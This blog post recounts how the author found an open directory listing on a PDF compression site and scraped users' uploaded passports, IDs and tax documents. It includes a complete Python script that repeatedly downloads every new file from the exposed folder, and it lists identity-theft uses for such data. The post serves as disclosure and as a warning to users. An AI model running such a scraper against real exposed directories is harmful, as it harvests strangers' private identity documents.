Don't Upload PDFs of Your Passport Publicly

This post was originally written in March 2014 but never published. It has been lightly edited for clarity, but the content, tone and code are preserved as they were. The site in question — compress-pdf.co.uk — no longer exists.

Disclaimer

The PDFs I collected were later deleted. They were not abused in any way.

This post is for educational purposes only. Any illegal acts you may partake in are not my responsibility and I will not be held liable for any trouble you may (will) get into. And I frankly think you are stupid if you do.

Introduction

The past week I have been messing with a bit of Python, web scraping, and accidentally stole a few passports in the process... Oops.

There was a website called compress-pdf.co.uk — a free online tool that let you upload a PDF and get a smaller, compressed version back. Simple enough. Millions of these sites exist.

compress-pdf.co.uk as captured by the Wayback Machine in December 2014

The problem? Their /temp_dl/ directory had directory listing enabled. That means anyone could just navigate to compress-pdf.co.uk/temp_dl/ and see every single file that users had uploaded for compression. No authentication, no access control, just an open Apache directory index.

People were uploading all kinds of things: scanned passports, internal company documents, tax forms, contracts, bank statements — all sitting in a publicly browsable folder.

The Script

I wrote a quick Python script that would periodically scrape the directory listing and download any new files:

import requests
import time
import os.path
import urllib
from bs4 import BeautifulSoup

url = "http://www.compress-pdf.co.uk/temp_dl/"
output_path = "pdf/"  # Save PDFs to this folder
sleeptime = 600

while True:

    # Cleans up the cache.
    urllib.urlcleanup()

    html = requests.get(url)
    soup = BeautifulSoup(html.text)

    for link in soup.find_all("a"):

        log_file = open("pdf.log", "a")
        if link.get("href").startswith("small_"):

            filename = link.get("href")

            if len(link.get("href")) > 254:
                filename = link.get("href")[:50] + ".pdf"

            if os.path.isfile(output_path + filename.replace("small_", "")) == False:
                urllib.urlretrieve(
                    url + link.get("href"),
                    output_path + filename.replace("small_", ""),
                )
                print "Downloaded: " + filename.replace("small_", "")
                log_file.write(
                    time.strftime("%c")
                    + " Downloaded: "
                    + filename.replace("small_", "")
                    + "\n"
                )

            if os.path.isfile(output_path + filename.replace("small_", "")) == True:
                print "Skipped: " + filename.replace("small_", "")
                log_file.write(
                    time.strftime("%c")
                    + " Skipped: "
                    + filename.replace("small_", "")
                    + "\n"
                )

        log_file.close()
    print "Waiting: " + str((sleeptime / 60)) + " minutes til next sweep"
    time.sleep(sleeptime)

Requirements: Requests, BeautifulSoup4

The script ran every 10 minutes, checked the directory listing for new files prefixed with small_ (the compressed output), and downloaded anything it hadn't already grabbed. Simple, dumb, effective.

What I Found

Over the course of a few days, the script collected hundreds of PDFs. Most were boring — school assignments, random documents, marketing brochures. But mixed in with the mundane stuff were:

Scanned passports — full color, high resolution, from multiple countries
National ID cards
Tax returns with full names, addresses, and social security numbers
Internal corporate documents — contracts, employee records, financial reports
Bank statements

People were compressing these sensitive documents without a second thought, trusting that the site would handle them responsibly. The site didn't even bother to clean up the temp directory.

What I Could Have Done With This

With a collection of scanned passports and identity documents, a malicious actor could:

Identity theft — open bank accounts, apply for credit cards, take out loans
Forge documents — create convincing fake IDs using real templates and data
Social engineering — use the personal details to impersonate someone convincingly
Sell the data — identity documents fetch good prices on dark web marketplaces

I did none of these things. I deleted everything after confirming the scope of the problem.

The Lesson

Never upload sensitive documents to random websites. This applies to:

PDF compressors
File converters (Word to PDF, image resizers, etc.)
"Free" online tools of any kind

You have no idea how these sites handle your files. They might store them indefinitely. They might have directory listing enabled. They might be logging everything. They might be the ones harvesting the data intentionally.

If you need to compress a PDF, do it locally. There are plenty of free tools that run on your own machine:

Preview on macOS (Export as PDF with Quartz filter)
Ghostscript on any platform
qpdf — a command-line PDF toolkit

Your passport deserves better than a sketchy .co.uk website's temp folder.